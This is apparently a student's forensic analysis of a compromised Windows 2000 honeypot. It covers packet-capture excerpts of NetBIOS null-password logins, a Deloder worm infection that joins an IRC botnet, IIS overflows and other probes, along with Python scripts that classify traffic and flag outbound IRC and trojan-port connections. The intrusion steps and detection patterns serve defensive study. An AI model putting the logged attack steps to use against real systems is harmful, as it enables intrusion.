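        return "directory-traversal-cmd-exe", "decoded path " + decoded
    return "benign-or-unknown", target


def tally(request_lines):
    """Count request lines per label, the way an IDS summary report would."""
    counts = {}
    for line in request_lines:
        label, _ = classify(line)
        counts[label] = counts.get(label, 0) + 1
    return counts
```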


FX-Scanner

The attack on the honeypot is a variant of the FX-Scanner.  The malicious program:

Sends a ping (ICMP)

Accesses port 80 (HTTP)

Accesses port 57 (no service is known for this port)

Accesses port 21 (FTP)


A series of different IP addresses, 192.130.71.66, 213.23.49.158, 141.85.37.78 and 203.170.177.8, aroused suspicion that an FX-Scanner-like program was being used.  There are no known services offered on port 57, yet both 192.130.71.66 and 213.23.49.158 sent the honeypot packets to port 57 and port 80.  141.85.37.78 and 203.170.177.8 both sent the honeypot packets attempting to connect to FTP on port 21.  The honeypot did not receive a ping.  I suspect that all these IP addresses were coordinated under one attack, but there is no way to know for sure.  It is possible that they were isolated incidents.

DameWare Remote Control Agent Vulnerability

210.22.204.101 also scans for DameWare Remote Control on port 6129.  It sends the following packet attempting to connect to the port:

2052 322422.446563 210.22.204.101        172.16.134.191        TCP      3870 > 6129 [SYN] Seq=2495283602 Ack=0 Win=64240 Len=0


Microsoft SQL Server Vulnerability

Many attackers attempted to connect to the honeypot on port 1433 looking for Microsoft SQL Server.  The query looked like this:

43 21871.711441 210.111.56.66         172.16.134.191        TCP      1929 > ms-sql-s [SYN] Seq=786885643 Ack=0 Win=64240 Len=0


The attackers were most likely attempting to spread the Microsoft SQL Slammer worm.  On Saturday, January 26, 2003, the worm shut down a large part of the Internet.  It uses a buffer overflow to break into MS SQL Server.  Once it infects a host, it sends copies of itself out across the Internet.

rpc.statd Vulnerability

A few attackers attempted to connect to the honeypot on port 111 looking for rpc.statd.  The rpc.statd program has an input validation flaw that allows an attacker to exploit it, and it is installed by default on Linux machines.  This is what the packet looked like:

246 146489.407148 204.50.186.37         172.16.134.191        TCP      4069 > sunrpc [SYN] Seq=2674258792 Ack=0 Win=32120 Len=0


Hack´a´Tack

A few attackers sent the honeypot UDP packets on port 28431.  That port is used by the Hack´a´Tack virus, which provides remote access, a keylogger and an IP scanner, and also steals passwords.  This is what the packet looked like:

10 6750.116690 62.150.170.134        172.16.134.191        UDP      Source port: 28432  Destination port: 28431


SOCKS Vulnerability

A few attackers attempted to connect to the honeypot on port 1080 looking for a SOCKS proxy service.  Hackers often use an open SOCKS proxy to bounce their packets through it and attack a third party, so that the packets appear to come from the proxy host rather than from the attacker.  This is what the packet looked like:

162 98205.654304 200.74.26.73          172.16.134.191        TCP      25590 > 1080 [SYN] Seq=410779648 Ack=0 Win=512 Len=0


Who Did What?  A list of attempted attacks

Windows 2000 NetBIOS vulnerabilities.

The following IP source addresses accessed ports 137, 139, or 445 in an attempt to exploit NetBIOS and SMB:


W32.HLLW.Deloder Worm: 61.111.101.78

Code Red Worm:

            Retina CodeRed Scanner: 68.169.174.108

            Code Red Worm: 218.25.147.83

Other IIS Buffer Overflows:

24.197.194.106

210.22.204.101

Directory Traversing Vulnerability:

24.197.194.106

FX-Scanner:

Accessed FTP: 141.85.37.78 and 203.170.177

Accessed port 57 and HTTP:  192.130.71.66 and 213.23.49.158

DameWare Remote Control Agent Vulnerability

210.22.204.101

Microsoft SQL Server Vulnerability


rpc.statd Vulnerability

204.50.186.37

212.243.23.179

Hack´a´Tack

62.150.170.134

62.150.170.232

SOCKS Vulnerability

200.74.26.73
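The grouping in this section, and the server list of beginning question 7, can be produced directly from Ethereal's packet-summary lines. The following is an added example, not the author's tooling: the sample lines are copied from captures quoted in this write-up (with the column whitespace collapsed), and the port-to-category table is an assumption assembled from the sections above.

```python
"""Sort Ethereal packet-summary lines into the probe categories of the
"Who Did What?" section and list the IRC servers the honeypot contacted.
Added example, not the author's tooling: the sample lines are copied from
captures quoted in this write-up (whitespace collapsed); the port table is
an assumption assembled from the sections above."""
import re
from collections import defaultdict

HONEYPOT = "172.16.134.191"

SAMPLE_LINES = [
    "43 21871.711441 210.111.56.66 172.16.134.191 TCP 1929 > ms-sql-s [SYN] Seq=786885643 Ack=0 Win=64240 Len=0",
    "246 146489.407148 204.50.186.37 172.16.134.191 TCP 4069 > sunrpc [SYN] Seq=2674258792 Ack=0 Win=32120 Len=0",
    "10 6750.116690 62.150.170.134 172.16.134.191 UDP Source port: 28432  Destination port: 28431",
    "162 98205.654304 200.74.26.73 172.16.134.191 TCP 25590 > 1080 [SYN] Seq=410779648 Ack=0 Win=512 Len=0",
    "2052 322422.446563 210.22.204.101 172.16.134.191 TCP 3870 > 6129 [SYN] Seq=2495283602 Ack=0 Win=64240 Len=0",
    "925 322205.478544 210.22.204.101 172.16.134.191 SMB Tree Connect AndX Request, Path: \\\\172.16.134.191\\IPC$",
    "33280 412046.012158 61.111.101.78 172.16.134.191 SMB NT Create AndX Request, Path: \\System32\\PSEXESVC.EXE",
    "1 0.000000 219.118.31.42 172.16.134.191 NBNS Name query NBSTAT *<00><00><00>",
    "35794 414909.249998 172.16.134.191 209.196.44.172 TCP 1152 > 6667 [SYN] Seq=4114925005 Ack=0 Win=16384 Len=0",
    "35795 414909.304675 209.196.44.172 172.16.134.191 TCP 6667 > 1152 [SYN, ACK] Seq=4266393801 Ack=4114925006 Win=32120",
    "34821 412112.717027 172.16.134.191 209.126.161.29 TCP 1127 > 6667 [SYN] Seq=3377670478 Ack=0 Win=16384 Len=0",
]

SUMMARY_RE = re.compile(r"^\s*(?P<frame>\d+)\s+(?P<time>[\d.]+)\s+(?P<src>\S+)\s+"
                        r"(?P<dst>\S+)\s+(?P<proto>\S+)\s+(?P<info>.*)$")
# Ethereal prints well-known ports by service name; map the names back to numbers.
SERVICE_PORTS = {"ms-sql-s": 1433, "sunrpc": 111, "netbios-ssn": 139,
                 "netbios-ns": 137, "microsoft-ds": 445, "http": 80, "ftp": 21}
# Destination port -> category, following the "Who Did What?" section (assumption).
PORT_CATEGORY = {
    137: "Windows NetBIOS/SMB", 139: "Windows NetBIOS/SMB", 445: "Windows NetBIOS/SMB",
    80: "IIS (HTTP)", 21: "FTP probe (FX-Scanner-like)", 57: "port 57 probe (FX-Scanner-like)",
    6129: "DameWare Remote Control", 1433: "Microsoft SQL Server", 111: "rpc.statd (sunrpc)",
    28431: "Hack'a'Tack", 1080: "SOCKS proxy", 6667: "IRC",
}


def _port(token):
    return int(token) if token.isdigit() else SERVICE_PORTS.get(token)


def parse_summary(line):
    """Parse one summary line into a dict; adds dport (and flags for TCP)."""
    m = SUMMARY_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["dport"] = None
    if rec["proto"] == "TCP":
        t = re.match(r"(\S+) > (\S+) \[([^\]]*)\]", rec["info"])
        if t:
            rec["dport"], rec["flags"] = _port(t.group(2)), t.group(3)
    elif rec["proto"] == "UDP":
        u = re.search(r"Destination port: (\S+)", rec["info"])
        if u:
            rec["dport"] = _port(u.group(1))
    return rec


def categorize(rec):
    """Map one frame to a category; application-layer hints override the port table."""
    proto, info = rec["proto"], rec["info"]
    if proto == "SMB":
        path = info.rsplit("Path: ", 1)[-1].upper() if "Path: " in info else ""
        if path.endswith(("PSEXESVC.EXE", "INST.EXE")):   # the two files Deloder drops
            return "W32.HLLW.Deloder worm (file drop)"
        if path.endswith("IPC$"):
            return "SMB IPC$ share access"
        return "Windows NetBIOS/SMB"
    if proto in ("NBNS", "NBSS", "NBDS"):
        return "Windows NetBIOS/SMB"
    if proto == "HTTP":
        return "IIS (HTTP)"
    return PORT_CATEGORY.get(rec["dport"], "other (%s port %s)" % (proto, rec["dport"]))


def who_did_what(lines, honeypot=HONEYPOT):
    """Attacker source addresses per category, for frames sent to the honeypot.
    TCP is counted only on the initial SYN so replies are not misattributed."""
    found = defaultdict(set)
    for line in lines:
        rec = parse_summary(line)
        if not rec or rec["dst"] != honeypot:
            continue
        if rec["proto"] == "TCP" and rec.get("flags") != "SYN":
            continue
        found[categorize(rec)].add(rec["src"])
    return {label: sorted(ips) for label, ips in found.items()}


def irc_servers_contacted(lines, honeypot=HONEYPOT):
    """Beginning question 7: servers the honeypot sent a SYN to on 6667/tcp, in order."""
    servers = []
    for line in lines:
        rec = parse_summary(line)
        if (rec and rec["src"] == honeypot and rec["dport"] == 6667
                and rec.get("flags") == "SYN" and rec["dst"] not in servers):
            servers.append(rec["dst"])
    return servers
```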


3.  Which attacks were successful?

Windows 2000 NetBIOS vulnerabilities

Those attackers that attempted to map the C drive through port 137 were unsuccessful.

8 0.514274    219.118.31.42         172.16.134.191        SMB      Tree Connect AndX Request, Path: \\PC0191\C

9 0.517180    172.16.134.191        219.118.31.42         TCP      netbios-ssn > 2388 [RST] Seq=2476847245 Ack=1943715703 Win=0 Len=0


In packet #9 the honeypot answered with a TCP RST (reset), meaning the connection could not be established.  This would have worked on an older version of Windows; on Windows 2000, however, the attacker has to log on to the IPC$ share instead, like this:

925 322205.478544 210.22.204.101        172.16.134.191        SMB      Tree Connect AndX Request, Path: \\172.16.134.191\IPC$

294 236849.783405 172.16.134.191        195.36.247.77         SMB      Tree Connect AndX Response


All the attackers that logged into the honeypot through the IPC$ share were successful.  They logged in to the Administrator account using the NULL password.

W32.HLLW.Deloder Worm

61.111.101.78 succeeded in exploiting the honeypot with the Deloder Worm.  As I described in the Vulnerabilities section, the worm logged in through the IPC$ share and installed the PSEXESVC.EXE and INST.EXE files.  Right after 61.111.101.78 finished communicating with the honeypot, the honeypot began attempting to log on to the IRC servers like so:

34821 412112.717027 172.16.134.191        209.126.161.29        TCP      1127 > 6667 [SYN] Seq=3377670478 Ack=0 Win=16384 Len=0

35739 412630.079021 172.16.134.191        66.33.65.58           TCP      1129 > 6667 [SYN] Seq=3523948626 Ack=0 Win=16384 Len=0

35745 413286.204510 172.16.134.191        63.241.174.144        TCP      1133 > 6667 [SYN] Seq=3688527302 Ack=0 Win=16384 Len=0

35762 413307.053048 172.16.134.191        217.199.175.10        TCP      1139 > 6667 [SYN] Seq=3694305514 Ack=0 Win=16384 Len=0

35794 414909.249998 172.16.134.191        209.196.44.172        TCP      1152 > 6667 [SYN] Seq=4114925005 Ack=0 Win=16384 Len=0

 

This tells us that 61.111.101.78 successfully exploited the honeypot and executed commands on it, telling it to log on to an IRC server and await commands.  The honeypot succeeded in logging in to the IRC server 209.196.44.172.  This IRC chatroom is a botnet that interacted with at least 6639 distinct hosts while the honeypot was logged in.  A little while after the honeypot logged into the botnet, it received an order to send the following packets:

 

39390 418489.571532 172.16.134.191        199.107.7.2           TCP      4828 > 31337 [SYN] Seq=892599022 Ack=0 Win=16384 Len=0

39394 418492.509669 172.16.134.191        199.107.7.2           TCP      4828 > 31337 [SYN] Seq=892599022 Ack=0 Win=16384 Len=0

39397 418498.652595 172.16.134.191        199.107.7.2           TCP      4828 > 31337 [SYN] Seq=892599022 Ack=0 Win=16384 Len=0

 

These packets were an attack on 199.107.7.2.  They were sent to TCP port 31337, which is the port that Back Orifice and a number of other Trojans run on.  However, the honeypot received no response from 199.107.7.2.
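The two observations above (the honeypot opening connections to IRC port 6667 after the Deloder infection, and later sending repeated, unanswered SYNs to 31337) can be turned into a repeatable check.  The following Python script is an added example, not part of the original writeup: it parses Ethereal summary lines in the layout quoted in this section, flags TCP SYNs that the honeypot itself originates to watched ports, and records whether the destination answered with SYN, ACK or whether the same SYN was only retransmitted.  The sample lines are constructed from the excerpts above; the port labels and the WATCH_PORTS set are this example's assumptions.

```python
import re
from collections import defaultdict

# Constructed sample, same layout as the Ethereal excerpts quoted above (frame, time, src, dst, proto, info).
SAMPLE_LINES = """
34821 412112.717027 172.16.134.191 209.126.161.29 TCP 1127 > 6667 [SYN] Seq=3377670478 Ack=0 Win=16384 Len=0
35794 414909.249998 172.16.134.191 209.196.44.172 TCP 1152 > 6667 [SYN] Seq=4114925005 Ack=0 Win=16384 Len=0
35795 414909.304675 209.196.44.172 172.16.134.191 TCP 6667 > 1152 [SYN, ACK] Seq=4266393801 Ack=4114925006 Win=32120
39390 418489.571532 172.16.134.191 199.107.7.2 TCP 4828 > 31337 [SYN] Seq=892599022 Ack=0 Win=16384 Len=0
39394 418492.509669 172.16.134.191 199.107.7.2 TCP 4828 > 31337 [SYN] Seq=892599022 Ack=0 Win=16384 Len=0
39397 418498.652595 172.16.134.191 199.107.7.2 TCP 4828 > 31337 [SYN] Seq=892599022 Ack=0 Win=16384 Len=0
"""

HONEYPOT = "172.16.134.191"
# Ports a honeypot should never connect out to (labels are this example's assumption).
WATCH_PORTS = {6667: "IRC (bot command channel)", 31337: "Back Orifice / trojan port"}
LINE_RE = re.compile(
    r"^(?P<frame>\d+)\s+(?P<time>[\d.]+)\s+(?P<src>[\d.]+)\s+(?P<dst>[\d.]+)\s+TCP\s+"
    r"(?P<sport>\S+)\s*>\s*(?P<dport>\S+)\s+\[(?P<flags>[^\]]+)\]\s+Seq=(?P<seq>\d+)")

def parse_lines(text):
    """Parse Ethereal TCP summary lines; numeric ports become ints, service names stay strings."""
    pkts = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # SMB, HTTP and other non-TCP summary lines are skipped
        p = m.groupdict()
        p["sport"], p["dport"] = (int(v) if v.isdigit() else v for v in (p["sport"], p["dport"]))
        pkts.append(p)
    return pkts

def answered(pkts, honeypot, dst, dport):
    """True if dst replied from dport with SYN, ACK, i.e. the handshake progressed."""
    return any(p["src"] == dst and p["dst"] == honeypot and p["sport"] == dport
               and "SYN" in p["flags"] and "ACK" in p["flags"] for p in pkts)

def report(text, honeypot=HONEYPOT):
    """One entry per (destination, port) the honeypot sent bare SYNs to on a watched port."""
    pkts = parse_lines(text)
    syns = defaultdict(list)
    for p in pkts:
        if p["src"] == honeypot and p["flags"] == "SYN" and p["dport"] in WATCH_PORTS:
            syns[(p["dst"], p["dport"])].append(p)
    out = []
    for (dst, dport), group in sorted(syns.items()):
        out.append({"dst": dst, "dport": dport, "what": WATCH_PORTS[dport], "syns": len(group),
                    "retransmitted": len({p["seq"] for p in group}) < len(group),  # same Seq resent: no reply
                    "answered": answered(pkts, honeypot, dst, dport)})
    return out
```

Run against the sample, the 209.196.44.172 entry is the only one marked answered, matching the successful IRC login described above, while the 199.107.7.2 entry shows three SYNs with one sequence number and no reply.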

 

Code Red Worm

 

After 218.25.147.83 launched the Code Red attack on the honeypot, it no longer interacted with the honeypot.  Since the honeypot did not proceed to send the Code Red worm to other machines, I am assuming that the attack was unsuccessful.

 

Other IIS Buffer Overflows

 

24.197.194.106 attempted a buffer overflow similar to the one described in the Vulnerabilities section.  However, it was unable to exploit the honeypot.

 

It appears that the buffer overflow attempted by 210.22.204.101 was successful.  Right after the buffer overflow, 210.22.204.101 was able to successfully connect to the honeypot on TCP port 4899, which is the Remote Administrator port.  Remote Administrator is used to control a computer remotely.  It is often used by technical support staff to assist someone in fixing their computer.  210.22.204.101 uses Remote Administrator to surf the internet in search of two tools: ZipCentral (zcsetup.exe) and FoundStone Fport (fport.zip).  The ZipCentral program is presumably used to unzip the Fport program.  Fport is a legitimate utility used to identify unknown open ports.  The file requests appear below:

 

18726 332245.693463 172.16.134.191        217.151.192.231       HTTP     GET /users/z/zcentral/zcsetup.exe HTTP/1.1

20815 335390.704047 172.16.134.191        216.154.242.126       HTTP     GET /knowledge/zips/fport.zip HTTP/1.1

 

The attacker successfully downloads the files.  Most likely, the attacker plans on using the honeypot to scan other computers and attack them at a later date.  He has probably left a backdoor on the honeypot.

 

Directory Traversing Vulnerability

 

24.197.194.106 attempted to exploit the honeypot's IIS using directory traversal.  There is no reason to believe that it succeeded.

 

FX-Scanner

 

The scans were successful, but the honeypot was not harmed.

 

DameWare Remote Control Agent Vulnerability

 

DameWare Remote Control Agent was not running on the honeypot and port 6129 was not open, so the attack was unsuccessful.

 

Microsoft SQL Server Vulnerability

 

Microsoft SQL Server was not running on the honeypot and port 1434 was not open, so the attack was unsuccessful.

 

rpc.statd Vulnerability

 

The rpc.statd service was not running on the honeypot and port 111 was not open, so the attack was unsuccessful.

 

Hack'a'Tack

 

The Hack'a'Tack attack was unsuccessful.

 

SOCKS Vulnerability

 

SOCKS was not running on the honeypot and port 1080 was not open, so the attack was unsuccessful.

 

General Questions

 

1.  What did you learn about analysis as a result of studying this scan?

 

I learned how to use Ethereal and Snort for the first time.  I discovered how many different attacks are out there and how vulnerable Windows 2000 is.  My fundamental understanding of packet-based networking has improved.

 

 

2.  How do you anticipate being able to apply your new knowledge and skills?

First of all, I will update my own Windows 2000 system.  I feel that upon graduating from college, I will be able to put these new skills to use in my profession.

 

 

3.  How can we improve the SotM challenge? What would you like to see added? What would you like to see done differently?

No complaints.

 

 

Sources and Useful Links:

 

A Short IRC Primer: http://www.irchelp.org/irchelp/ircprimer.html

Just What is a Botnet? http://zine.dal.net/previousissues/issue22/botnet.php

Ports List: http://www.neohapsis.com/neolabs/neo-ports/neo-ports.html

Buffer Overflow in IIS info: http://www.eeye.com/html/Research/Advisories/AD20010618.html

Deloder Worm Analysis: http://www.klcconsulting.net/deloder_worm.htm

Input Validation Problem in rpc.statd: http://www.cert.org/advisories/CA-2000-17.html

Firewall Forensics: http://www.robertgraham.com/pubs/firewall-seen.html

"Code Red" Worm Exploiting Buffer Overflow In IIS: http://www.cert.org/advisories/CA-2001-19.html

TCP 6129 - Dameware: http://lists.insecure.org/lists/incidents/2002/Aug/0107.html